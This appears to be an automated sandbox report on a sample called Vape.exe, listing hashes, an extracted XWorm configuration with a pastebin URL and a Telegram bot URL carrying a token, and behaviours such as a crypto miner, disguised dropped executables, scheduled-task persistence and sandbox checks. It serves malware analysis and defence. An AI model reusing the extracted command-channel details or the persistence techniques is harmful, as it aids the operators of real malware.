Analysis
-
max time kernel
83s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 13:39
Static task
static1
Behavioral task
behavioral1
Sample
Vape.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Vape.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
Vape.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
Vape.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
Vape.exe
Resource
win11-20240426-en
Behavioral task
behavioral6
Sample
Vape.exe
Resource
macos-20240410-en
General
-
Target
Vape.exe
-
Size
16.9MB
-
MD5
b682cd3286eb0cd188dc896d6fd7fa0c
-
SHA1
f6f15cbc94072cbdab5ae4548c4b13d787f6f617
-
SHA256
66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b
-
SHA512
a30ada153f1c2ead70bbe27b3bb770512d04b469ec3e3f19266f81cd06150e1297e06877c5ed899040a7a760d64d24892477df17294721fd8560082a634ce2f5
-
SSDEEP
393216:61HGgtq8HRisK/m6Smj8xBPKEUVrHCKAfcI:6tGOqKRO/9Smj8bPsxsfcI
Malware Config
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
Microsoft_WindowsDefender.exe
-
pastebin_url
https://pastebin.com/raw/dxKNAdeE
-
telegram
https://api.telegram.org/bot7013809678:AAEFwh-OW3w4YnEldOGR6NvGudG5gj8iF0Q/sendMessage?chat_id=5073217277
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/1884-104-0x0000000000790000-0x00000000007A8000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\Msvchost.exe family_xworm behavioral4/memory/7896-2008-0x0000000000DE0000-0x0000000000DF8000-memory.dmp family_xworm -
Process spawned unexpected child process 45 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5416 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5492 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5560 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6112 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6452 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6896 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6152 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7116 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4836 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5172 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5588 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 864 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4828 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1424 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3228 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6032 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5764 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5788 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5272 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6116 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3564 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7068 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6272 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5816 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6668 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6536 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2828 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5600 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5700 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6248 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6072 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6600 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3788 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6364 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6368 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6604 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5492 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6324 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6640 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6712 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5776 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5552 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5424 432 schtasks.exe wmiprvse.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5416 432 schtasks.exe wmiprvse.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 6308 created 7444 6308 WerFault.exe WMIC.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 6724 created 7444 6724 svchost.exe WMIC.exe PID 6724 created 6092 6724 svchost.exe powershell.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe dcrat behavioral4/memory/3620-258-0x00000000004B0000-0x000000000063C000-memory.dmp dcrat C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe dcrat -
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral4/memory/6512-566-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-565-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-593-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-591-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-592-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-589-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral4/memory/6512-590-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3228 powershell.exe 6700 powershell.exe 2172 powershell.exe 1864 powershell.exe 4316 powershell.exe 5768 powershell.exe 6736 powershell.exe -
Creates new service(s) 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Microsoft_Protection.exeMsvchost.exeWScript.exeIntoref.exeVape.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Microsoft_Protection.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Msvchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Intoref.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Vape.exe -
Drops startup file 2 IoCs
Processes:
Msvchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk Msvchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk Msvchost.exe -
Executes dropped EXE 13 IoCs
Processes:
Microsoft_Protection.exeMicrosoft_crypt.exeMicrosoft_R.exeMicrosoft_R.exeMicrosoft_M.exeMsvchost.exeMicrosoft_M.exeIntoref.exelhhsgwktkatl.exemsedge.exerar.exerar.exeMicrosoft_WindowsDefender.exepid process 4828 Microsoft_Protection.exe 400 Microsoft_crypt.exe 2852 Microsoft_R.exe 4692 Microsoft_R.exe 3600 Microsoft_M.exe 1884 Msvchost.exe 4700 Microsoft_M.exe 3620 Intoref.exe 6684 lhhsgwktkatl.exe 6704 msedge.exe 5200 rar.exe 6360 rar.exe 7896 Microsoft_WindowsDefender.exe -
Loads dropped DLL 33 IoCs
Processes:
Microsoft_R.exeMicrosoft_M.exepid process 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4692 Microsoft_R.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe 4700 Microsoft_M.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI28522\python311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_ctypes.pyd upx behavioral4/memory/4692-139-0x00007FFFA16A0000-0x00007FFFA16AF000-memory.dmp upx behavioral4/memory/4692-138-0x00007FFFA0BA0000-0x00007FFFA0BC3000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\unicodedata.pyd upx behavioral4/memory/4692-181-0x00007FFF92910000-0x00007FFF92933000-memory.dmp upx behavioral4/memory/4692-187-0x00007FFF8C390000-0x00007FFF8C709000-memory.dmp upx behavioral4/memory/4692-194-0x00007FFF8C270000-0x00007FFF8C38C000-memory.dmp upx behavioral4/memory/4700-206-0x00007FFF9FEA0000-0x00007FFF9FEAF000-memory.dmp upx behavioral4/memory/4700-205-0x00007FFF8AA60000-0x00007FFF8AA83000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI36002\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI36002\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI36002\libcrypto-1_1.dll upx behavioral4/memory/4700-214-0x00007FFF888B0000-0x00007FFF88A20000-memory.dmp upx behavioral4/memory/4700-217-0x00007FFF897F0000-0x00007FFF8981E000-memory.dmp upx behavioral4/memory/4700-220-0x00007FFF8A610000-0x00007FFF8A624000-memory.dmp upx behavioral4/memory/4700-223-0x00007FFF9A6C0000-0x00007FFF9A6CD000-memory.dmp upx behavioral4/memory/4700-224-0x00007FFF88090000-0x00007FFF881AC000-memory.dmp upx behavioral4/memory/4700-219-0x00007FFF881B0000-0x00007FFF88268000-memory.dmp upx behavioral4/memory/4700-218-0x00007FFF85EB0000-0x00007FFF86229000-memory.dmp upx behavioral4/memory/4700-216-0x00007FFF9FE20000-0x00007FFF9FE2D000-memory.dmp upx behavioral4/memory/4700-215-0x00007FFF8A630000-0x00007FFF8A649000-memory.dmp upx behavioral4/memory/4700-213-0x00007FFF8A650000-0x00007FFF8A673000-memory.dmp upx behavioral4/memory/4700-212-0x00007FFF8AA40000-0x00007FFF8AA59000-memory.dmp upx behavioral4/memory/4700-211-0x00007FFF8A680000-0x00007FFF8A6AD000-memory.dmp upx behavioral4/memory/4700-195-0x00007FFF8C940000-0x00007FFF8CF29000-memory.dmp upx behavioral4/memory/4692-193-0x00007FFFA0B50000-0x00007FFFA0B5D000-memory.dmp upx behavioral4/memory/4692-192-0x00007FFF8DBD0000-0x00007FFF8DBE4000-memory.dmp upx behavioral4/memory/4692-186-0x00007FFF8C710000-0x00007FFF8C7C8000-memory.dmp upx behavioral4/memory/4692-185-0x00007FFF8DBF0000-0x00007FFF8DC1E000-memory.dmp upx behavioral4/memory/4692-184-0x00007FFFA12C0000-0x00007FFFA12CD000-memory.dmp upx behavioral4/memory/4692-183-0x00007FFF92D20000-0x00007FFF92D39000-memory.dmp upx behavioral4/memory/4692-182-0x00007FFF8C7D0000-0x00007FFF8C940000-memory.dmp upx behavioral4/memory/4692-180-0x00007FFFA0B80000-0x00007FFFA0B99000-memory.dmp upx behavioral4/memory/4692-179-0x00007FFF92D40000-0x00007FFF92D6D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI28522\_decimal.pyd upx behavioral4/memory/4692-87-0x00007FFF8CF30000-0x00007FFF8D519000-memory.dmp upx behavioral4/memory/6512-561-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-566-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-565-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-560-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-563-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-593-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-591-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-592-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-589-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-590-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-564-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/6512-562-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral4/memory/4692-1441-0x00007FFF8CF30000-0x00007FFF8D519000-memory.dmp upx behavioral4/memory/4692-1661-0x00007FFFA0BA0000-0x00007FFFA0BC3000-memory.dmp upx behavioral4/memory/4692-1887-0x00007FFF8C7D0000-0x00007FFF8C940000-memory.dmp upx behavioral4/memory/4692-1890-0x00007FFF8C390000-0x00007FFF8C709000-memory.dmp upx behavioral4/memory/4692-1889-0x00007FFF8C710000-0x00007FFF8C7C8000-memory.dmp upx behavioral4/memory/4692-1888-0x00007FFF8DBF0000-0x00007FFF8DC1E000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Msvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft_WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft_WindowsDefender.exe" Msvchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 31 ip-api.com -
Drops file in System32 directory 15 IoCs
Processes:
svchost.exelhhsgwktkatl.exesvchost.exesvchost.exepowershell.exeOfficeClickToRun.exeMicrosoft_crypt.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\MRT.exe lhhsgwktkatl.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe Microsoft_crypt.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Microsoft_crypt.exelhhsgwktkatl.exedescription pid process target process PID 400 set thread context of 5716 400 Microsoft_crypt.exe dialer.exe PID 6684 set thread context of 2520 6684 lhhsgwktkatl.exe dialer.exe PID 6684 set thread context of 6468 6684 lhhsgwktkatl.exe dialer.exe PID 6684 set thread context of 6512 6684 lhhsgwktkatl.exe dialer.exe -
Drops file in Program Files directory 6 IoCs
Processes:
Intoref.exedescription ioc process File created C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe Intoref.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\5940a34987c991 Intoref.exe File created C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe Intoref.exe File created C:\Program Files\Windows Photo Viewer\en-US\5b884080fd4f94 Intoref.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe Intoref.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\c82b8037eab33d Intoref.exe -
Drops file in Windows directory 6 IoCs
Processes:
Intoref.exedescription ioc process File created C:\Windows\Help\msedge.exe Intoref.exe File created C:\Windows\Help\61a52ddc9dd915 Intoref.exe File created C:\Windows\WinSxS\Registry.exe Intoref.exe File created C:\Windows\WinSxS\x86_netfx4-clrjit_dll_b03f5f7f11d50a3a_4.0.15805.110_none_651953c043d81ca4\wininit.exe Intoref.exe File created C:\Windows\security\templates\cmd.exe Intoref.exe File created C:\Windows\security\templates\ebf1f9fa8afd6d Intoref.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 6368 sc.exe 5924 sc.exe 5932 sc.exe 6376 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 20 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exemousocoreworker.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
